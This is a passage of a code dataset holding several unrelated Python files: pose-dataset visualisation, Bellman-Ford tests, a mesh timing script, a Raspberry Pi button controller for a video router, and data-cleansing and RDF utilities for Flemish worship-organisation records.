train_loader = DataLoader(dataset, batch_size=batch, shuffle=True, num_workers=1)\n\n print(\"load data cost \", time.time() - st)\n\n blur = GaussianBlur_CUDA(0.9)\n\n for batch_data in train_loader:\n # print(batch_data)\n\n for i in range(batch):\n rot = batch_data['R'][i]\n trans = batch_data['T'][i]\n center = batch_data['C'][i]\n focal = batch_data['F'][i]\n scale = batch_data['scale'][i]\n\n center = center * scale\n focal *= scale\n\n # print(rot.shape, trans.shape, len(batch_data['joints']))\n img = batch_data['tensor'][i].cuda().unsqueeze(0)\n img = blur(img)\n img = img.cpu().squeeze(0).permute(1, 2, 0).numpy()\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n\n # img1 = batch_data['tensor1'][i].permute(1, 2, 0).numpy()\n # img1 = cv2.cvtColor(img1, cv2.COLOR_RGB2BGR)\n\n heatmap = batch_data['heatmap'][i].permute(1, 2, 0).numpy()\n # heatmap = heatmap[:, :, :255].sum(2)\n heatmap = heatmap[:, :, 255:]#.sum(2)\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_GRAY2BGR)\n heatmap = cv2.resize(heatmap, (512, 512))\n\n paf_map = batch_data['paf'][i].permute(1, 2, 0).numpy()\n paf_map = paf_map.sum(2)\n # print(paf_map.shape)\n paf_map = cv2.cvtColor(paf_map, cv2.COLOR_GRAY2BGR)\n paf_map = cv2.resize(paf_map, (512, 512))\n\n # for xyz in batch_data['joints'][i]:\n # # print(xyz.shape, xyz, batch_data['joints'][i])\n # # print(xyz.shape, \" - \", trans.shape)\n # # print(xyz.shape, rot.shape)\n # xyz = torch.mm(rot, (xyz - trans).unsqueeze(0).transpose(1, 0)).reshape(3)\n #\n # x, y = CamProj(xyz[0], xyz[1], xyz[2], focal[0], focal[1], center[0], center[1])\n # # print(x, y)\n # cv2.circle(img, (int(x.item()), int(y.item())), 5, [0, 0, 255], -1)\n\n left = [4, 5, 6, 11, 12, 13]\n for j in range(len(batch_data['joints_2d'][i])):\n xyz = batch_data['joints_2d'][i][j]\n color = BODY_CONN_COLOR[j]\n # color = [0, 255, 255] if j in left else [0, 255, 0]\n sz = 5 if j in left else 3\n cv2.circle(img, (int(xyz[0].item()), int(xyz[1].item())), sz, color, -1)\n\n cv2.imshow(\"test\", img)\n cv2.imshow(\"heatmap\", heatmap)\n cv2.imshow(\"paf\", paf_map)\n\n # print(type(batch_data['extra'][i]), batch_data['extra'][i].shape)\n for j in range(2):\n # for j in range(len(batch_data['extra'][i])):\n t = batch_data['extra'][i][j * 3:(j+1)*3, ...]\n e = t.permute(1, 2, 0).numpy()\n ie = cv2.cvtColor(e, cv2.COLOR_RGB2BGR)\n cv2.imshow(f\"extra_{j}\", ie)\n\n pafs = batch_data['paf'][i].permute(1, 2, 0).numpy()\n\n scale = 4\n img_p = np.zeros((pafs.shape[1] * 8, pafs.shape[0] * 8, 3), dtype=np.uint8)\n # pafs[pafs < 0.07] = 0\n for idx in range(len(BODY_PARTS_PAF_IDS)):\n # print(pp, pafs.shape)\n pp = BODY_PARTS_PAF_IDS[idx]\n k_idx = BODY_PARTS_KPT_IDS[idx]\n cc = BODY_CONN_COLOR[idx]\n\n vx = pafs[:, :, pp[0]]\n vy = pafs[:, :, pp[1]]\n for i in range(pafs.shape[1]):\n for j in range(pafs.shape[0]):\n a = (i * 2 * scale, j * 2 * scale)\n b = (2 * int((i + vx[j, i] * 3) * scale), 2 * int((j + vy[j, i] * 3) * scale))\n if a[0] == b[0] and a[1] == b[1]:\n continue\n\n cv2.line(img_p, a, b, cc, 1)\n\n # break\n\n cv2.imshow(\"paf\", img_p)\n\n key = cv2.waitKey(0)\n if key == 27: # esc\n exit(0)\n","sub_path":"datasets/h36m_test.py","file_name":"h36m_test.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"622944691","text":"\"\"\"\nModule with tests for shortest-paths graphs problems.\n\"\"\"\nimport unittest\n\nfrom pystrukts.graphs import Graph\nfrom pystrukts.graphs.common import Vertex\nfrom pystrukts.graphs.shortest_paths import bellman_ford\n\n\nclass TestSuiteShortestPathsGraphs(unittest.TestCase):\n \"\"\"\n Test suite for shortest-paths graphs problems.\n \"\"\"\n\n def test_should_run_bellman_ford_without_negative_weight_cycles(self):\n \"\"\"\n Should run Bellman-Ford without negative weight cycles (algorithm should return True).\n \"\"\"\n # arrange\n g: Graph[str] = self.build_weighted_and_directed_graph_1()\n s: Vertex[str] = g.get_vertex(\"s\")\n\n # act\n has_no_negative_weight_cycle = bellman_ford(g, s)\n\n # assert\n self.assertTrue(has_no_negative_weight_cycle)\n self.assertEqual(g.get_vertex(\"s\").distance, 0)\n self.assertEqual(g.get_vertex(\"t\").distance, 3)\n self.assertEqual(g.get_vertex(\"x\").distance, 9)\n self.assertEqual(g.get_vertex(\"y\").distance, 5)\n self.assertEqual(g.get_vertex(\"z\").distance, 11)\n\n def test_should_run_bellman_ford_with_negative_weight_cycles(self):\n \"\"\"\n Should run Bellman-Ford without negative weight cycles (algorithm should return False).\n \"\"\"\n # arrange\n g: Graph[str] = self.build_negative_weight_cycle_graph()\n s: Vertex[str] = g.get_vertex(\"s\")\n\n # act\n has_no_negative_weight_cycle = bellman_ford(g, s)\n\n # assert\n self.assertFalse(has_no_negative_weight_cycle)\n\n def build_weighted_and_directed_graph_1(self) -> Graph[str]:\n g: Graph[str] = Graph(directed=True, weighted=True)\n\n s = g.add_vertex(\"s\")\n t = g.add_vertex(\"t\")\n x = g.add_vertex(\"x\")\n y = g.add_vertex(\"y\")\n z = g.add_vertex(\"z\")\n\n g.add_edge(s, t, 3)\n g.add_edge(t, x, 6)\n g.add_edge(t, y, 2)\n g.add_edge(y, t, 1)\n g.add_edge(s, y, 5)\n g.add_edge(x, z, 2)\n g.add_edge(z, x, 7)\n g.add_edge(y, z, 6)\n g.add_edge(y, x, 4)\n g.add_edge(z, s, 3)\n\n return g\n\n def build_negative_weight_cycle_graph(self) -> Graph[str]:\n g: Graph[str] = Graph(directed=True, weighted=True)\n\n s = g.add_vertex(\"s\")\n t = g.add_vertex(\"t\")\n x = g.add_vertex(\"x\")\n y = g.add_vertex(\"y\")\n z = g.add_vertex(\"z\")\n\n g.add_edge(s, t, 3)\n g.add_edge(t, x, 6)\n g.add_edge(t, y, 2)\n g.add_edge(y, t, 1)\n g.add_edge(s, y, 5)\n g.add_edge(y, z, 6)\n g.add_edge(y, x, 4)\n g.add_edge(z, s, 3)\n\n # negative weight cycle\n g.add_edge(x, z, 2)\n g.add_edge(z, x, -7)\n\n return g\n","sub_path":"tests/graphs/shortest_paths/test_bellman_ford.py","file_name":"test_bellman_ford.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"189245439","text":"#Test cells/subset\nimport numpy as np\nimport sys\nsys.path.append(r'C:\\Users\\tghad\\Documents\\GitHub\\TarekGhaddarGraduateWork\\sweep_optimizer\\3d')\nfrom mesh_processor import get_cells_per_subset_3d_numerical,create_3d_cuts,get_cells_per_subset_3d_numerical_test2,create_2d_cuts\nfrom mesh_processor import get_cells_per_subset_2d_test, get_cells_per_subset_2d_numerical\nimport build_3d_adjacency as b3a\nfrom build_global_subset_boundaries import build_global_subset_boundaries\nfrom build_adjacency_matrix import build_adjacency\nimport time\n\n\n#xmin = 0.0\n#xmax = 60.96\n#ymin = 0.0\n#ymax = xmax\n#zmin = xmin\n#zmax = 146.05\nxmin = 0.0\nxmax = 1.0\nymin = 0.0\nymax = 1.0\n\n\nz_cuts,x_cuts,y_cuts = create_3d_cuts(xmin,xmax,5,ymin,ymax,5,zmin,zmax,5)\nboundaries = b3a.build_3d_global_subset_boundaries(4,4,4,x_cuts,y_cuts,z_cuts)\n\nx_cuts,y_cuts = create_2d_cuts(xmin,xmax,2,ymin,ymax,2)\nboundaries = build_global_subset_boundaries(1,1,x_cuts,y_cuts)\nadjacency_matrix = build_adjacency(boundaries,1,1,y_cuts)\n\npoints = np.genfromtxt(\"../unbalanced_pins_centroid_data\").T\n\n#start = time.time()\n#cells_per_subset,bdy_cells_per_subset = get_cells_per_subset_3d_numerical(points,boundaries)\n#end = time.time()\n#print(end-start)\n\n#start = time.time()\n#cells_per_subset_test,bdy_cells_per_subset_test = get_cells_per_subset_3d_numerical_test2(points,boundaries)\n#end = time.time()\n#print(end-start)\n\nstart = time.time()\ncells_per_subset,bdy_cells_per_sub = get_cells_per_subset_2d_test(points,boundaries,adjacency_matrix,2,2)\nend = time.time()\n\nprint(end - start)\nstart = time.time()\ncells_per_subset_old,bdy_cells_per_sub_old = get_cells_per_subset_2d_numerical(points,boundaries,adjacency_matrix,2,2)\nend = time.time()\nprint(end-start)","sub_path":"Dissertation/python_scripts/im1_mesh/test_cells_per_subset_3d.py","file_name":"test_cells_per_subset_3d.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"413337325","text":"#!/usr/bin/python\nimport RPi.GPIO as GPIO\nimport socket\nimport sys\nimport time\n###################################################################\n# insert in '/etc/crontab'\n#@reboot root [/location/ofyourfile.py]\n#for autostart\n####################################################################\n#insert\n#\n#\n#establish GPIOS\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(21, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(20, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(26, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(16, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(19, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(13, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(12, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(6, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(5, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(7, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(8, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(11, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(25, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(9, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(10, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(24, GPIO.IN, pull_up_down = GPIO.PUD_UP)\n\n# Establish TCP/IP sockets\n#vcs --> Switcher\nsockvcs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = ('192.168.1.60', 9990)\nsockvcs.connect(server_address)\ntime.sleep(0.4)\ndata = sockvcs.recv(8888)\n\n#Define switcher Output\n\n#Define each input\n#\n#\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" [input(logical)]\" + \"\\n\\n\")\noutput = 15\n#print('start')\nwhile True:\n\t#Button01\n\tif(GPIO.input(21) == 0):\n\t\t#print('Button 1 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 42\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button02\n\tif(GPIO.input(20) == 0):\n\t\t#print('Button 2 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 43\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button03\n\tif(GPIO.input(26) == 0):\n\t\t#print('Button 3 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 44\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button04\n\tif(GPIO.input(16) == 0):\n\t\t#print('Button 4 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 45\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button05\n\tif(GPIO.input(19) == 0):\n\t\t#print('Button 5 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 46\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button06\n\tif(GPIO.input(13) == 0):\n\t\t#print('Button 6 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 47\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button07\n\tif(GPIO.input(12) == 0):\n\t\t#print('Button 7 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button08\n\tif(GPIO.input(6) == 0):\n\t\t#print('Button 8 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button09\n\tif(GPIO.input(5) == 0):\n\t\t#print('Button 9 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button10\n\tif(GPIO.input(7) == 0):\n\t\t#print('Button 10 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button11\n\tif(GPIO.input(8) == 0):\n\t\t#print('Button 11 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button12\n\tif(GPIO.input(11) == 0):\n\t\t#print('Button 12 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button13\n\tif(GPIO.input(25) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button14\n\tif(GPIO.input(9) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button15\n\tif(GPIO.input(10) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button16\n\tif(GPIO.input(24) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t\n\t\t\nGPIO.cleanup()\n","sub_path":"Videohubtools-master/butt16_1.py","file_name":"butt16_1.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340368059","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom datetime import datetime\nimport dateparser\nimport hashlib\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nfrom cleansing import central, contact, organization, worship\nfrom rdflib import Graph, Literal, URIRef\nfrom rdflib.namespace import SKOS, RDFS, XSD\nimport re\n\nSPARQL = SPARQLWrapper(\"https://centrale-vindplaats.lblod.info/sparql\")\n\ndef load_gp():\n return pd.read_excel('input/gemeente-provincie.xlsx', sheet_name='Feuil2')\n\nGP = load_gp()\n\ndef concept_uri(base_uri, input):\n m = hashlib.md5()\n m.update(input.encode('utf-8'))\n\n return (URIRef(base_uri + m.hexdigest()), m.hexdigest())\n\ndef add_literal(g, subject, predicate, object_value, datatype=None):\n if object_value != str(np.nan):\n if datatype == None:\n g.add((subject, predicate, Literal(object_value, lang='nl')))\n else:\n g.add((subject, predicate, Literal(object_value, datatype=datatype)))\n\ndef shuffle_word(word):\n return ''.join(random.sample(word.lower(), len(word))).title() \n \ndef status_mapping_central(status):\n status_dict = {'Operationeel': 'Actief', 'Niet actief - Samengevoegd n.a.v. een gemeentefusie': 'Niet Actief', \n 'Operationeel – nieuw CKB n.a.v. gemeentefusie': 'Actief', 'Niet actief - opgeheven': 'Niet Actief',\n 'Niet actief - Niet van toepassing': 'Niet Actief', 'Niet actief - ontbreekt': 'DELETE RECORD'}\n\n return status_dict[status]\n\ndef status_mapping_worship(status):\n status_dict = {'Erkenningsaanvraag in behandeling': 'DELETE RECORD', 'Operationeel': 'Actief', 'Niet actief - Samengevoegd (overgenomen)': 'Niet Actief',\n 'Operationeel - Samengevoegd (met behoud van naam)': 'Actief', 'Niet actief - Samengevoegd (nieuwe entiteit)': 'Niet Actief',\n 'Operationeel - Samengevoegd (met nieuwe naam)': 'Actief', 'Niet actief - Erkenning niet toegestaan': 'Niet Actief',\n 'Operationeel - Samenvoeging lopende':\t'Actief', 'Niet actief - Ingetrokken': 'Niet Actief', 'Operationeel - Intrekkingsaanvraag lopende':\t'Actief'}\n\n return status_dict[status]\n\ndef status_mapping_org(status):\n status_dict = {'Actief': 'Actief', 'Afgesloten (Vereffend)': 'Niet actief', 'Bijna Afgesloten (In ontbinding, ontbonden of in vereffening)': 'Niet actief',\n 'Formeel opgericht maar nog niet operationeel': 'Niet actief', 'gefusioneerd': 'Niet actief', 'In oprichting': 'Niet actief'}\n\n return status_dict[status]\n\ndef bestuursorgaan_mapping_central(type):\n bestuursorgaan_dict = {'Rooms-Katholiek': 'Centraal kerkbestuur', 'Orthodox': 'Centraal kerkbestuur', 'Islamitisch': 'Centraal bestuur'}\n\n return bestuursorgaan_dict[type]\n\ndef bestuursorgaan_mapping_worship(type):\n bestuursorgaan_dict = {'Rooms-Katholiek': 'Kerkraad', 'Rooms-Katholiek Kathedraal': 'Kathedrale kerkraad', 'Protestants': 'Bestuursraad', 'Orthodox': 'Kerkfabriekraad',\n 'Islamitisch': 'Comité', 'Israëlitisch': 'Bestuursraad', 'Anglicaans': 'Kerkraad', 'nan': 'nan'}\n\n return bestuursorgaan_dict[type]\n\ndef bestuurseenheid_mapping_org(type):\n bestuurseenheid_dict = {'AGB': 'Autonoom gemeentebedrijf', 'APB': 'Autonoom provinciebedrijf', 'HVZ': 'Hulpverleningszone', 'PZ': 'Politiezone', \n 'IGS_PV': 'Projectvereniging', 'IGS_DV': 'Dienstverlenende vereniging', 'IGS_OV': 'Opdrachthoudende vereniging'}\n\n return bestuurseenheid_dict[type]\n\ndef find_central_info(central_db, central_id):\n central_row = central_db[central_db['Titel'] == central_id][['KBO_CKB_cleansed','Naam_CKB']]\n\n return (str(central_row['KBO_CKB_cleansed'].values[0]), str(central_row['Naam_CKB'].values[0]))\n\ndef find_central_entity(central_graph, central_titel, central_kbo, central_name):\n concept = None\n\n query = \"\"\"\n SELECT ?central WHERE { ?central skos:prefLabel ?central_name; adms:identifier ?identifier_sp . \n ?identifier_sp generiek:gestructureerdeIdentificator ?titel_id .\n ?titel_id generiek:lokaleIdentificator ?central_titel .\n }\n \"\"\"\n\n # ?identifier_kbo generiek:gestructureerdeIdentificator ?kbo_id . ?kbo_id generiek:lokaleIdentificator ?central_kbo .\n # 'central_kbo': Literal(central_kbo, datatype=XSD.string)\n\n namespaces = {\n 'generiek': 'https://data.vlaanderen.be/ns/generiek#',\n 'skos': SKOS,\n 'adms': 'http://www.w3.org/ns/adms#'\n }\n\n bindings = {\n 'central_name': Literal(central_name, datatype=XSD.string),\n 'central_titel': Literal(central_titel, datatype=XSD.string), \n }\n\n qres = central_graph.query(query, initNs = namespaces, initBindings = bindings)\n\n if qres.bindings:\n concept = qres.bindings[0]['central']\n \n return concept\n \ndef load_graph(name):\n cl = Graph()\n\n cl.parse(f'input/codelists/{name}.ttl', format='ttl')\n\n return cl\n\ndef get_concept_id(graph, label):\n concept = None\n \n qres = graph.query('SELECT ?concept WHERE { ?concept skos:prefLabel ?label .}',\n initNs = { \"skos\": SKOS }, initBindings={'label': Literal(label)})\n\n if qres.bindings:\n concept = qres.bindings[0]['concept']\n \n return concept\n\ndef get_location_id(graph, label, level):\n concept = None\n\n qres = graph.query(\"\"\"SELECT ?loc WHERE { ?loc rdfs:label ?label; ext:werkingsgebiedNiveau ?level. }\"\"\",\n initNs = { \"rdfs\": RDFS, \"ext\": \"http://mu.semte.ch/vocabularies/ext/\" }, initBindings={'label': Literal(label, datatype=XSD.string), 'level': Literal(level, datatype=XSD.string)})\n\n if qres.bindings:\n concept = qres.bindings[0]['loc']\n\n return concept\n\ndef get_label_role(role):\n label_role_dict = {'voorzitter worship':'Voorzitter van het bestuur van de eredienst', 'voorzitter central': 'Voorzitter van het centraal bestuur van de eredienst', \n 'secretaris worship': 'Secretaris van het bestuur van de eredienst', 'secretaris central': 'Secretaris van het centraal bestuur van de eredienst', \n 'penningmeester worship': 'Penningmeester van het bestuur van de eredienst', 'lid worship': 'Bestuurslid van het bestuur van de eredienst', \n 'lid central': 'Bestuurslid van het centraal bestuur van de eredienst'}\n\n return label_role_dict[role]\n\ndef space_cleansing(space):\n return re.sub(r'\\s', '', space)\n\ndef naam_contact_cleansing(naam_contact):\n naam_contact_cleansed = comment = np.nan\n\n if naam_contact != 'nan':\n naam_contact = naam_contact.strip().title()\n\n if re.match(r'^[a-zA-ZàáâäãåąčćęèéêëėįìíîïłńòóôöõøùúûüųūÿýżźñçčšžÀÁÂÄÃÅĄĆČĖĘÈÉÊËÌÍÎÏĮŁŃÒÓÔÖÕØÙÚÛÜŲŪŸÝŻŹÑßÇŒÆČŠŽ∂ð \\'’-]+$', naam_contact):\n naam_contact_cleansed = naam_contact\n else: \n comment = 'Wrong naam format. Check it.'\n\n return [naam_contact_cleansed, comment]\n\ndef referentieorganisatie_cleansing(referentieorganisatie):\n return re.sub(r'\\s', '', referentieorganisatie)\n\ndef split_house_bus_number(house_bus_number):\n house_number = bus_number = np.NaN\n comment = []\n house_bus_number = house_bus_number.replace(' ', '')\n\n if ('z/n' not in house_bus_number and 'nan' not in house_bus_number) : \n if ('bus' in house_bus_number or '/' in house_bus_number):\n comment.append('Splitting. Check it.')\n if ('bus' in house_bus_number) : \n split = house_bus_number.split('bus')\n else :\n split = house_bus_number.split('/')\n house_number = split[0]\n bus_number = split[1]\n else:\n house_number = house_bus_number\n house_number = house_number.replace('/', '').replace('-', '').replace(',', '').replace(';', '')\n \n return [house_number, bus_number, ' - '.join(comment)]\n\ndef postcode_cleansing(postcode):\n postcode_cleansed = comment = np.NaN\n\n if str(postcode) != str(np.nan):\n if re.search(r'\\b[^\\d\\W]+\\b', postcode):\n postcode_extract = re.sub(r'\\D', '', postcode)\n comment = \"Wrong postcode format. Check it.\"\n postcode_cleansed = postcode_extract.strip()\n elif re.match(r'\\d{4}', postcode):\n postcode_cleansed = postcode\n else:\n comment = 'No postcode found.'\n\n return [postcode_cleansed, comment]\n\ndef gemeente_cleansing(city):\n gemeente_cleansed = comment = np.nan\n sl = None\n\n if city != 'nan':\n if ' (' in city:\n sl = city.split(' (')\n elif '(' in city:\n sl = city.split('(')\n elif '-' in city:\n sl = city.split('-')\n\n if sl != None:\n if is_municipality(sl[0]):\n gemeente_cleansed = sl[0]\n else:\n comment = \"Municipality Not Found\"\n else:\n if is_municipality(city):\n gemeente_cleansed = city\n else:\n comment = \"Municipality Not Found\"\n\n return [gemeente_cleansed, comment]\n \ndef find_city_province(city):\n return GP[GP['Gemeente'].str.fullmatch(city)]\n\ndef provincie_cleansing(row):\n provincie_cleansed = comment = np.nan\n\n city = row[row.index[0]]\n province = row[row.index[1]]\n \n if city != 'nan':\n result = find_city_province(city)\n \n if len(result) > 0:\n if str(result.iloc[0]['Provincie']).lower().strip() != province.lower().strip():\n provincie_cleansed = result.iloc[0]['Provincie'].strip().title()\n comment = \"Different Province\"\n else:\n provincie_cleansed = province\n else:\n provincie_cleansed = province\n comment = \"Municipality Not Found\"\n elif province != 'nan':\n provincie_cleansed = province\n comment = \"Municipality Empty\"\n\n return [provincie_cleansed, comment]\n\ndef mail_cleansing(mail):\n mail_cleansed = comment = np.nan\n\n if str(mail) != 'nan':\n if re.match(r'[\\w\\.-]+@[\\w\\.-]+(\\.[\\w]+)+', mail):\n mail_cleansed = mail\n else: \n comment = 'Wrong mail format. Check it.'\n\n return [mail_cleansed, comment]\n\ndef split_mail(mail):\n mail_voorzitter = mail_voorzitter_comment = mail_secretaris = mail_secretaris_comment = np.nan\n\n mails = []\n if str(mail) != 'nan':\n if 'V:' in mail:\n mail_voorzitter = mail[mail.find(\"V\")+2:mail.find(\"S\")].strip()\n mail_secretaris = mail[mail.find(\"S\")+2:].strip()\n if ';' in mail:\n mails = mail.split(';')\n elif ' ' in mail:\n mails = mail.split(' ')\n else:\n mail_voorzitter = mail\n\n if len(mails) > 0:\n mail_voorzitter = mails[0].strip()\n mail_secretaris = mails[1].strip()\n\n mail_voorzitter, mail_voorzitter_comment = mail_cleansing(mail_voorzitter)\n\n if str(mail_secretaris) != 'nan' or len(mail_secretaris) > 0:\n mail_secretaris, mail_secretaris_comment = mail_cleansing(mail_secretaris)\n\n return [mail_voorzitter, mail_voorzitter_comment, mail_secretaris, mail_secretaris_comment]\n\ndef website_cleansing(website):\n website_cleansed = comment = np.nan\n\n if website != 'nan':\n if re.match(r'https?:\\/\\/(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,4}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)', website):\n website_cleansed = website\n else: \n comment = 'Wrong website format. Check it.'\n\n return [website_cleansed, comment]\n\ndef telephone_number_cleansing(telephone_number):\n telephone_number = re.sub(r'\\s', '', telephone_number)\n\n telephone_number = re.sub(r'tel:', '', telephone_number)\n telephone_number = re.sub(r'tel', '', telephone_number)\n telephone_number = re.sub(r'
', '', telephone_number)\n\n telephone_number = re.sub(r'^\\+32-\\(0\\)', '0', telephone_number)\n telephone_number = re.sub(r'^\\+32', '0', telephone_number)\n telephone_number = re.sub(r'^32', '0', telephone_number)\n\n telephone_number = re.sub(r'^\\+0032-\\(0\\)', '0', telephone_number)\n telephone_number = re.sub(r'^0032-\\(0\\)', '0', telephone_number)\n telephone_number = re.sub(r'^0032', '0', telephone_number)\n\n telephone_number = re.sub(r'^\\(\\d\\d\\d\\)', '0', telephone_number)\n telephone_number = re.sub(r'^0\\(\\d\\d\\d\\)', '0', telephone_number)\n\n telephone_number = re.sub(r'[\\.a-zA-Z]', '', telephone_number)\n\n return split_telephone_number(telephone_number)\n\ndef split_telephone_number(telephone_number):\n telephone_number_1 = telephone_number_2 = np.nan\n comment = []\n\n split = [telephone_number]\n if '//' in telephone_number:\n split = telephone_number.split('//')\n elif '-' in telephone_number:\n split = telephone_number.split('-')\n elif ';' in telephone_number:\n split = telephone_number.split(';')\n elif 'enGSM:' in telephone_number:\n split = telephone_number.split('enGSM:')\n\n split[0] = split[0].replace('/', '')\n\n if telephone_number != '' :\n if check_telephone_number_lenght(split[0]):\n telephone_number_1 = split[0]\n else:\n comment.append('Wrong telephone number lenght. Check it.')\n\n if len(split) == 2 :\n comment.append('Splitting. Check it.')\n split[1] = split[1].replace('/', '')\n if check_telephone_number_lenght(split[1]):\n telephone_number_2 = split[1]\n else:\n comment.append('Wrong telephone 2 number lenght. Check it.')\n\n return [telephone_number_1, telephone_number_2, ' - '.join(comment)]\n\ndef check_telephone_number_lenght(telephone_number):\n if len(telephone_number) < 9 or len(telephone_number) > 10:\n return False\n else:\n return True\n\ndef kbo_cleansing(kbo):\n\n kbo_cleansed = comment = np.nan\n\n if str(kbo) != str(np.nan):\n kbo = re.sub(r'\\D', '', kbo)\n if re.match(r'\\d{10}', kbo):\n kbo_cleansed = kbo\n elif re.match(r'\\d{6,9}', kbo):\n kbo_cleansed = kbo\n comment = f'Only {len(kbo)} digits. Missing some digits?'\n else: \n comment = 'Wrong KBO format. Check it.'\n else :\n comment = 'No KBO nr found'\n\n return [kbo_cleansed, comment]\n\ndef load_possible_first_names():\n # using statbel firstnames of newborns (heuristic)\n m = pd.read_excel('input/Voornamen_Jongens_1995-2017_0.xls', sheet_name='1995-2019')\n male_names = (m['Unnamed: 1'].append(m['Unnamed: 4']).append(m['Unnamed: 7']).append(m['Unnamed: 10'])).unique()\n f = pd.read_excel('input/Voornamen_meisjes_1995-2017.xls', sheet_name='1995-2019')\n female_names = (f['Unnamed: 1'].append(f['Unnamed: 4']).append(f['Unnamed: 7']).append(f['Unnamed: 10'])).unique()\n\n manual_entries = ['Friedo', 'Renilde', 'Jozef', 'Maria-André', 'Gedo', 'Yvo', 'Marie-Cecile', 'Fonny', 'Luciaan', 'Willy', 'Fredy']\n\n first_names = np.concatenate([male_names,female_names, manual_entries])\n\n first_names = np.delete(first_names, np.where(first_names == 'Van'))\n first_names = np.delete(first_names, np.where(first_names == 'Blomme'))\n\n return first_names\n\ndef is_known_first_name(potential_name, first_names):\n return potential_name in first_names\n\ndef remove_title(full_name):\n mv = re.compile('(mevr|dhr)[\\.]?[\\s]?', re.IGNORECASE)\n return mv.sub('', full_name)\n\ndef splitname(full_name, first_names):\n first = last = np.nan\n comment = []\n\n if 'verkozen' in full_name or 'vacature nog open' in full_name or 'vacant' in full_name:\n comment = 'Vacant position'\n return [first, last, comment]\n \n likely_last_names = ['Vos', 'Matthijs', 'Stevens', 'Maere', 'Rubens', 'Beer', 'Duran', 'Roos', 'Broos', 'Thijs', 'Perre', 